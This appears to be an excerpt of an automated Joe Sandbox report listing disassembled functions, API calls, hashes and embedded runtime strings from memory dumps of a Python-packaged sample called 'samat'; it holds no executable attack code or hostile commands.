                                                                                                                                                                                                                                                                                      • Instruction ID: 8445c8d3681addd9ba2868a00c8f532dfc382d4983b341cbe9fc9248172d3bfe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c20b954deb9a9200817a31d63ae06041e07210914048fb5353322c95aff8119
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9811E962B18B0681EB548F5DE88026C6360FF88FC8F985031EB1D8A775EE3DD4958700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Authority$Arg_CountErr_ParseStringTuple
                                                                                                                                                                                                                                                                                      • String ID: The index is out of range
                                                                                                                                                                                                                                                                                      • API String ID: 706982848-505141048
                                                                                                                                                                                                                                                                                      • Opcode ID: d87ec0b1fcf0a1068b55480798adcdb78cb2436f0da94cff30977aef3b577662
                                                                                                                                                                                                                                                                                      • Instruction ID: 493488e385ac78a42039db16f911485ebe10a627d55657f4838a173c002b9dce
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d87ec0b1fcf0a1068b55480798adcdb78cb2436f0da94cff30977aef3b577662
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0711D672A1974282EB058B59E85056D3360FF88F85F445036EA5D47365DE3CE495C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PyLong_AsVoidPtr.PYTHON313 ref: 00007FF8B7E8D0F5
                                                                                                                                                                                                                                                                                      • PyErr_Occurred.PYTHON313 ref: 00007FF8B7E8D103
                                                                                                                                                                                                                                                                                      • PyErr_Clear.PYTHON313 ref: 00007FF8B7E8D10E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B
                                                                                                                                                                                                                                                                                      • PyErr_Format.PYTHON313 ref: 00007FF8B7E8D13C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Long$Occurred$Long_$ClearFormat$DeallocNumber_UnsignedVoid
                                                                                                                                                                                                                                                                                      • String ID: WPARAM is simple, so must be an int object (got %s)
                                                                                                                                                                                                                                                                                      • API String ID: 4021378859-3057595559
                                                                                                                                                                                                                                                                                      • Opcode ID: 650d8dcc8cadc460fa6b0e6a961d0bec92543f936dcd9b3b363ec97f9a6b6c7e
                                                                                                                                                                                                                                                                                      • Instruction ID: dc39007608968ecd759f38e15c7ffa31d5cdffc18d4c5136e05a6449149634b0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 650d8dcc8cadc460fa6b0e6a961d0bec92543f936dcd9b3b363ec97f9a6b6c7e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE011E22A19B8281EB508BAAF44416D6360FF48FC8F485036EF5E57765DE3CE495C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Long$FromLong_$BuildValue
                                                                                                                                                                                                                                                                                      • String ID: NiNNi(ii)
                                                                                                                                                                                                                                                                                      • API String ID: 3269351011-1588869203
                                                                                                                                                                                                                                                                                      • Opcode ID: 395cab98014d2c388113e4450b3a3dd1ebaa526a5b2c7052f1148e00d7086c69
                                                                                                                                                                                                                                                                                      • Instruction ID: 673b3b0d330b0a794ed4989a229d39d41415987de98e9ae44b8192b1c9335cfc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 395cab98014d2c388113e4450b3a3dd1ebaa526a5b2c7052f1148e00d7086c69
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72017276A08B4187DB24CF96F48446AB7A1FB8CBE0B144125EB9E43B68DF3CE4458B00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                                                      • Instruction ID: c812952b3c9c5f1efef9bf35d97d970c124134a5925a48ec373d531ee2ef18c3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9F0682270970681EF15AB24EC563759328FF49761F944237D57E451E4DFBDD044C322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-3727861699
                                                                                                                                                                                                                                                                                      • Opcode ID: a8a18ab51c0ace33371640f700a6781e50acd9c5c690dac03b5a74432ef410f9
                                                                                                                                                                                                                                                                                      • Instruction ID: 4f26c9a5e5b878cbdb69dd526fd7bd06eab50859aa4996643f0efb09bd35af9e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8a18ab51c0ace33371640f700a6781e50acd9c5c690dac03b5a74432ef410f9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAD17A72609A8AC6DB64CF29D4046AA77A5FB88BC8F158036DF4D477A5EF39D843C304
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                                      • API String ID: 0-3727861699
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e912ee1f7678e77240253c0303bb73c2f618f6b1c89537da6c189cf6ac1dde9
                                                                                                                                                                                                                                                                                      • Instruction ID: 196b3da1b37173549a684472304b3979b73a3f82f1817b3a07d474e0cc81454e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e912ee1f7678e77240253c0303bb73c2f618f6b1c89537da6c189cf6ac1dde9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7581E562A0C6D58AEB548B29D5846BE7BA0FB417C4F044132DF8D476A1CF3CE497C744
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorSecurity$ControlLengthfreemallocmemcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3383347431-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 00db8a8ef03e6ccfc7907ca2be9497b938e4a031f4901367d256bfa0d2a9a409
                                                                                                                                                                                                                                                                                      • Instruction ID: 4ac2cb198127315ba41a6c97ccaaec2d3a1a6c0b03684e6d1e4055c165ea14d5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00db8a8ef03e6ccfc7907ca2be9497b938e4a031f4901367d256bfa0d2a9a409
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D117F22708B4182FB049BAEE9401FD5264EF8AFD4F480135EF0D46BA5DF3CD9958700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _Py_NewReference.PYTHON313(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88BFD
                                                                                                                                                                                                                                                                                      • GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88C0E
                                                                                                                                                                                                                                                                                      • GetSecurityDescriptorControl.ADVAPI32(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88C3F
                                                                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88C58
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88C6B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorSecurity$ControlLengthReferencemallocmemcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3412238872-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c15fc75f51fb05eaa94f12650e5f0670c83e32bb2e77d43decb978ab075af439
                                                                                                                                                                                                                                                                                      • Instruction ID: 90fa96618d65736e0fa48052f1ed825b047232e4f9594a4606110c54deacbd88
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c15fc75f51fb05eaa94f12650e5f0670c83e32bb2e77d43decb978ab075af439
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76114922B08B4196FB449BAEA9003A96264EF84FD5F480035DF4C03BA5EF7CE5A5C750
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                      • Instruction ID: 7da888a16346858616c46f2e1825281b0af9907d375dea920da0568e8fa27529
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2118922F5CA0301FF563256ECA33799258AF55360E84D637FA6FD63D68EFC58414122
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3AF
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3CE
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3F6
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB407
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB418
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                                                                      • Instruction ID: d42ab028b4c6c82e7e75043ef3cc9cafb51a2374711b1084feed7626b62e337f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D116022F0864241FB54B726ED633B99149AF457B0FC84336D82E467CADDBDE4528226
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                                                                      • Instruction ID: f3fc36c4f2c9f8cf0da75019a1960821875c7ac530a93af9de9d1ee1cf7523cb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1113622F0820342FB687262CC277BE914A5F46335F84473AD93E0A2C6DDBDB8114237
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                                      • Instruction ID: 0449f084a999739a1ea63e0c6ec76723555590a9e7e7d8026b7d5408e26b1d21
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B91D233B0864681F760AE24DC5277DB7A9AB44B94FC44133DA6D473D5DEBDE4058322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-1196891531
